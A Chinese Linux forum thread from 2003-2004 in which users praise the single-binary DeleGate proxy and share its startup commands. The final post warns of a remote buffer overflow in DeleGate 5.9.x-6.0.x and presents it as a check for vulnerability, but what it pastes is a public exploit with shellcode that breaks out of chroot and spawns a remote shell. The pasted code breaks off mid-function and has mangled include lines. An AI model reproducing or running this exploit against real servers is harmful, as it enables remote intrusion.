由 aries1998 在 10-22-2003 22:32 发表:
不推荐这个代理服务器对不住良心啊,太....强.....了......啊........
昨天唆使我寝室的一个兄弟装了linux,怎么着也得让他用上QQ啊,我的系统是mdk9.2,他的也是,首先是squid, 不妙core dump,换redhat的squid,一样core dump 下载源码squid,我靠,居然还是core dumo,找了半天,发现了kingate,还好,上网浏览可以,ftp有问题,sock5更怪gaim-icq可以上,gaim-qq就上不了。
马上搬出google,找了半天,发现一个oops,下了,make的时候居然要我装bsd db,faint,我哪里去找,然后,对,就是然后,我发现了她,delegated,下载tar.gz 1M 解压缩 1.2M ,configure make make install,没问题,找了半天,怎么没有delegeted这个文件,/usr下面也没有,我晕啊,难道又失败了,马上看readme,怎么?原来编译后只有一个文件delegated,在安装文件夹的src目录里面,看看,这么多文件编译后就一个文件,看了看它的manual,好长啊,选项和参数和gcc有一拼,看了半天,算是看懂了一点,运行,在我同学的机子上面看效果,http ftp完全没问题,现在重头是QQ,哈啦路亚,上了!
相信我,这个一个文件的代理服务器真的很强,支持http,ftp,smtp,pop3,sock......... cache acl ............好了,就这样吧。
签名
由 georgek 在 10-23-2003 05:00 发表:
那裡下的呢? 還沒有找到
由 wallace888 在 10-23-2003 07:57 发表:
楼主哪里有这个的下载啊!提供一下好吗?谢谢了!
由 aries1998 在 10-23-2003 12:35 发表:
google 搜索delegated 你就知道哪里下载了,而且官方网站好象打不开!
签名
由 wallace888 在 10-23-2003 14:20 发表:
楼主你可以把你的这个东东的具体配置方法做的详细些吗?谢谢!
由 aries1998 在 10-23-2003 16:19 发表:
> quote:
>
> * * *
>
> 最初由 wallace888 发表
>
> 楼主你可以把你的这个东东的具体配置方法做的详细些吗?谢谢!
>
> * * *
其实很简单,我们用得最多得就是http,ftp和socks代理了,下面是我的一个脚本
delegated -P8080 TIMEOUT=dns:30,dnsinv=18,acc=30,con=30 SERVER=http
delegated -P1080 SERVER=socks
delegated -P2121 TIMEOUT=dns:30,dnsinv=18,acc=30,con=30 SERVER=ftp
把delegated这个文件考到/usr/bin下面 -P后面接服务端口 不要加空格
TIMEOUT后面是超时,我调得比较大,然后就是SERVER了 填http,ftp,socks,或者打开编译目录下面doc文件夹下面得manual.htm,里面列出了可用得服务选项,很多,每个服务用一个delegated命令打开,一般这三个就完全足够了,如果带宽很小得朋友建议把timeout的值调大一点,功能还有很多,真的很难相信就只有一个文件,linux下面的东西就是强大啊,感觉绝对不比squid弱多少,根据manual里面的内容,认证,缓存什么功能全部支持。
最后还是建议好好看看manual.htm 很详细,也很多
签名
由 linusware 在 10-23-2003 16:40 发表:
传到ftp上吧。急用!!
======不用linux的人是可耻的======
DELL Inspiron 500m
P-M (centrino) 1.4Mhz
60G/512M ddr
Philips DVD+RW
Mandrake Linux Offical 10 (single OS)
由 qing 在 10-23-2003 16:51 发表:
http://www.delegate.org/delegate/
211.248.137.253 8080
离开这里吧。。。。请封号。。删贴。。我先删了一部分。。
由 大熊宝宝 在 10-24-2003 12:38 发表:
主页上已经有下载了
请兄弟们正确发贴,把问题发到相关版块 发贴标题请简明扼要 谢谢大家配合.
新会员发贴前请学会搜索论坛 有可能你的问题已经有答案了
由 sombad 在 12-22-2003 14:01 发表:
为什么我安装成功后,
delegated -P8080 TIMEOUT=dns:30,dnsinv=18,acc=30,con=30 SERVER=http
delegated -P1080 SERVER=socks
delegated -P2121 TIMEOUT=dns:30,dnsinv=18,acc=30,con=30 SERVER=ftp
有时可以正常运行,有时说无法联接。
由 wsmsun 在 09-23-2004 08:16 发表:
有安全问题
DeleGate存在远程缓冲溢出漏洞
受影响的版本:
DeleGate/5.9.7或更在的版本
DeleGate/6.0.1 (最新版本)
远程:YES:本地:UNKOWN
DeleGate通常是一个应用级的网关,也可用作为多用户 proxy.但在该产品中存在一个安全问题,将允许远程的入侵者执行任意代码.
以下代码将检测您的系统是否存在该安全漏洞:/* delefate.c
delegate 5.9.x - 6.0.x remote exploit
public
will open a shell with the privileges of the nobody user.
1999/13/11 by scut of teso [ http://teso.scene.at/ ]
word to whole team teso, ADM, w00w00, beavuh and stealth
.
special thanks to xdr for donating a bit of his elite debugging skillz.
*/
#include
1<sys types.h="">
2
3#include <sys time.h="">
4
5#include <sys socket.h="">
6
7#include <netinet in.h="">
8
9#include <arpa inet.h="">
10
11#include <unistd.h>
12
13#include <errno.h>
14
15#include <stdlib.h>
16
17#include <stdio.h>
18
19#include <string.h>
20
21#include <fcntl.h>
22
23#include <netdb.h>
24
25
26
27
28
29#define XP_OFFSET 0xbfffe074 /* offset */
30
31unsigned long int xp_off = XP_OFFSET;
32
33
34
35/* you don't have to modify this  i hope 
36
37*/
38
39#define XP_NETWORK_FD 12
40
41#define XP_NETWORK_OFFSET 0x00000101 /* fixed relative network socket offset */
42
43#define XP_SHELLCODE_OFFSET 0x00000104 /* fixed relative retaddr offset */
44
45#define XP_DIFF 0x0000000e /* 14 bytes after XP_OFFSET starts the shellcode */
46
47
48
49#define XP_SH2_FD1 0x00000011
50
51#define XP_SH2_FD2 0x0000001d
52
53#define XP_SH2_FD3 0x0000002a
54
55
56
57
58
59#define GREEN "\E[32m"
60
61#define BOLD "\E[1m"
62
63#define NORMAL "\E[m"
64
65#define RED "\E[31m"
66
67
68
69/* local functions
70
71*/
72
73void usage (void);
74
75void shell (int socket);
76
77unsigned long int net_resolve (char *host);
78
79int net_connect (struct sockaddr_in *cs, char *server,
80
81unsigned short int port, int sec);
82
83
84
85
86
87/* because the buffer is rather small (256 bytes), we use a minimalistic
88
89* read() shellcode to increase the chances to hit a correct offet
90
91*/
92
93unsigned char shellcode1[] =
94
95"\x77\x68\x6f\x69\x73\x3a\x2f\x2f\x61\x20\x62\x20\x31\x20\x90\x90"
96
97"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
98
99"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
100
101"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
102
103"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
104
105"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
106
107"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
108
109"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
110
111"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
112
113"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
114
115"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
116
117"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
118
119"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
120
121"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
122
123"\x90\x90\x90\x90\x90\x90"
124
125
126
127/* 30 byte read() shellcode by scut */
128
129"\x33\xd2\x33\xc0\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x80\xc2"
130
131"\x10\x03\xca\xc1\xc2\x04\xb0\x03\x33\xdb\xb3\x0c\xcd\x80"
132
133/* ^^ network fd */
134
135"\x82\xe0\xff\xbf" /* return address */
136
137
138
139"\x0d\x0a";
140
141
142
143
144
145/* uid+chroot-break+shell shellcode by lamerz, thanks !
146
147* slightly modified by scut to take care of the network socket
148
149*/
150
151unsigned char shellcode2[]=
152
153"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9"
154
155"\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0"
156
157"\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd"
158
159"\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e"
160
161"\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27"
162
163"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d"
164
165"\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c"
166
167"\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d"
168
169"\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
170
171"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b"
172
173"\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30"
174
175"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67";
176
177
178
179
180
181void
182
183usage (void)
184
185{
186
187printf (GREEN BOLD "delefate - delegate 5.9.x, 6.0.x remote" NORMAL "\n"
188
189"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n"
190
191
192
193"usage.... : ./delefate <host> <port> [offset-add]\n"
194
195"example.. : ./delefate localhost 8080 -100\n\n"
196
197"for brute forcing, try from -2000 to 500 in steps of 200\n\n");
198
199
200
201exit (EXIT_FAILURE);
202
203}
204
205
206
207int
208
209main (int argc, char **argv)
210
211{
212
213int socket;
214
215char *server;
216
217struct sockaddr_in sa;
218
219unsigned short int port_dest;
220
221unsigned char *retaddr_ptr;
222
223unsigned long int offset;
224
225unsigned char *stack = NULL;
226
227
228
229if (argc < 3)
230
231usage ();
232
233
234
235printf (GREEN BOLD "delefate 5.9.x - 6.0.x remote exploit" NORMAL "\n"
236
237"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n");
238
239
240
241if (argc == 4) {
242
243long int xp_add = 0;
244
245
246
247if (sscanf (argv[3], "%ld", &xp_add) != 1) {
248
249usage ();
250
251}
252
253xp_off += xp_add;
254
255}
256
257printf (" " GREEN "-" NORMAL " using offset 0x%08x\n", xp_off);
258
259
260
261server = argv[1];
262
263port_dest = atoi (argv[2]);
264
265
266
267/* do the offset
268
269*/
270
271retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET;
272
273offset = xp_off + XP_DIFF;
274
275*retaddr_ptr = (offset & 0x000000ff) >> 0;
276
277*(retaddr_ptr + 1) = (offset & 0x0000ff00) >> 8;
278
279*(retaddr_ptr + 2) = (offset & 0x00ff0000) >> 16;
280
281*(retaddr_ptr + 3) = (offset & 0xff000000) >> 24;
282
283*(shellcode1 + XP_NETWORK_OFFSET) = (unsigned char) XP_NETWORK_FD;
284
285*(shellcode2 + XP_SH2_FD1) = (unsigned char) XP_NETWORK_FD;
286
287*(shellcode2 + XP_SH2_FD2) = (unsigned char) XP_NETWORK_FD;
288
289*(shellcode2 + XP_SH2_FD3) = (unsigned char) XP_NETWORK_FD;
290
291
292
293printf (" " GREEN "-" NORMAL " connecting to " GREEN "%s  hu" NORMAL "...", server, port_dest);
294
295fflush (stdout);
296
297
298
299socket = net_connect (&sa, server, port_dest, 45);
300
301if (socket <= 0) {
302
303printf (" " RED BOLD "failed" NORMAL ".\n");
304
305perror ("net_connect");
306
307exit (EXIT_FAILURE);
308
309}
310
311printf (" " GREEN BOLD "connected." NORMAL "\n");
312
313
314
315/* send minimalistic read() shellcode */
316
317printf (" " GREEN "-" NORMAL " sending first shellcode...\n");
318
319write (socket, shellcode1, strlen (shellcode1));
320
321sleep (1);
322
323
324
325/* now send the real shellcode :-) */
326
327printf (" " GREEN "-" NORMAL " sending second shellcode...\n");
328
329write (socket, shellcode2, strlen (shellcode2));
330
331
332
333printf (" " GREEN "-" NORMAL " spawning shell...\n\n");
334
335shell (socket);
336
337close (socket);
338
339
340
341
342
343exit (EXIT_SUCCESS);
344
345}
346
347
348
349unsigned long int
350
351net_resolve (char *host)
352
353{
354
355long i;
356
357struct hostent *he;
358
359
360
361i = inet_addr (host);
362
363if (i == -1) {
364
365he = gethostbyname (host);</port></host></netdb.h></fcntl.h></string.h></stdio.h></stdlib.h></errno.h></unistd.h></arpa></netinet></sys></sys></sys>